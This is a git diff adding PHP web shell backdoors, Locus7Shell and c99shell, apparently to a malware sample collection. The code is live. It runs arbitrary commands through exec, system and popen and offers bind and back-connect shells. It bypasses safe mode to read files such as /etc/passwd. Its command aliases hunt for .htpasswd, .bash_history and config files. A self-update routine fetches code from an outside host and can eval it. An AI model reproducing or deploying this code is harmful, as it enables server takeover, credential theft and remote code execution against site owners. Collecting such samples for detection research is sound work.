+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
    ");}}}} + natsort($images); + $k = array_keys($images); + echo "
    "; + foreach ($k as $u) {echo $u.":
    ";} + echo "
    "; + } + exit; +} +if ($act == "about") {echo "
    Credits:
    Idea, leading and coding by tristram[CCTeaM].
    Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].
    Thanks all who report bugs.
    All bugs send to tristram's ICQ #656555 .
    ";} +if ($act == "backc") +{ + $ip = $_SERVER["REMOTE_ADDR"]; + $msg = $_POST['backcconnmsg']; + $emsg = $_POST['backcconnmsge']; + echo("
    Back-Connection:

    Host: Port: Use:
    Click 'Connect' only after you open port for it first. Once open, use NetCat, and run 'nc -l -n -v -p 5992'

    "); + echo("$msg"); + echo("$emsg"); +} + +if ($act == "shbd"){ +$msg = $_POST['backcconnmsg']; +$emsg = $_POST['backcconnmsge']; +echo("
    Bind Shell Backdoor:

    +Bind Port: + +
    "); +echo("$msg"); +echo("$emsg"); +echo("
    "); +} ?> +
    + +
    Enter:
     
    Select:
     
    +
    + + + + + +
    +
    Useful Commands +
    +
    +
    + + + + +   + +
    + Warning. Kernel may be alerted using higher levels
    +
    +
    +
    Kernel Info:
    + + + + + + +
    +

    + + + + + +
    +
    Php Safe-Mode Bypass (Read Files) +

    +
    +
    + File:

    eg: /etc/passwd
    + + + + + + + Trying To Get File $get
    "; + if(copy("compress.zlib://".$file, $temp)){ + $fichier = fopen($temp, "r"); + $action = fread($fichier, filesize($temp)); + fclose($fichier); + $source=htmlspecialchars($action); + echo "
    Start $get

    $source

    Fin $get
    "; + unlink($temp); + } else { + die("
    Sorry... File + ".htmlspecialchars($file)." dosen't exists or you don't have + access.
    "); + } + echo "
    "; + } + + if(isset($_GET['file'])) +{ +rsg_read(); +} + + ?> + + $chemin
    "; +foreach ($files as $filename) { + echo "
    ";
    +   echo "$filename\n";
    +   echo "
    "; +} +} + +if(isset($_GET['directory'])) +{ +rsg_glob(); +} + +?> + +
    +
    +
    +
    +
    Php Safe-Mode Bypass (List Directories):
    +

    + Dir:

    eg: /etc/
    + +
    +
    + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + + +
    Search
      - regexp 

    Upload
     
    +
    Make Dir
     
    Make File
     
    +
    Go Dir
     
    Go File
     
    +

    --[ x2300 Locus7Shell v. Modded by #!physx^ | www.LOCUS7S.com | Generation time: ]--

    + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.C99Shell.w b/PHP/Backdoor.PHP.C99Shell.w new file mode 100644 index 00000000..1c9f7866 --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.w @@ -0,0 +1,3149 @@ +$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0 pre-release build #16"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +//$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +//$pass = ""; //password +//$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "HoofMaGoof Hacked Web Server Access"; //http-auth message. +$accessdeniedmess = "
    c99shell v.".$shver.": access denied"; + +$gzipencode = TRUE; //Encode with gzip? + +$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) + +$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server +$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server + +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "
    [L.S.T]å‹æƒ…PHP-Shell-[Slenk.Net]
    (o0↑謎誷↓0o[L.S.T]-部分汉化)

    如å‘现汉化错误或翻译ä¸å½“之处,请登陆http://www.51show.vxv.cnå馈信æ¯
    "; +/* If you publish free shell and you wish +add link to your site or any other information, +put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: +0 - files and folders (as default), +1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "" (default) + string {closetag} - close html-tag, e.g. "" (default) + bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"",""), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("查看已开端å£", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("查看已开端å£", "netstat -an") + ); +} + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Refresh\"",""), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d"), + array("ç¼–ç ",$surl."act=encoder&d=%d"), + array("工具",$surl."act=tools&d=%d"), + array("Proc.",$surl."act=processes&d=%d"), + array("FTP brute",$surl."act=ftpquickbrute&d=%d"), + array("Sec.",$surl."act=security&d=%d"), + array("SQL",$surl."act=sql&d=%d"), + array("PHP-ç¼–ç ",$surl."act=eval&d=%d"), + array("æ›´æ–°",$surl."act=update&d=%d"), + array("å馈",$surl."act=feedback&d=%d"), + array("自身移动",$surl."act=selfremove"), + array("退出","#\" onclick=\"if (confirm('你确定?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: 你的主机拒ç»è®¿é—® (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
    "," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return FALSE;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = TRUE) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually here.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = 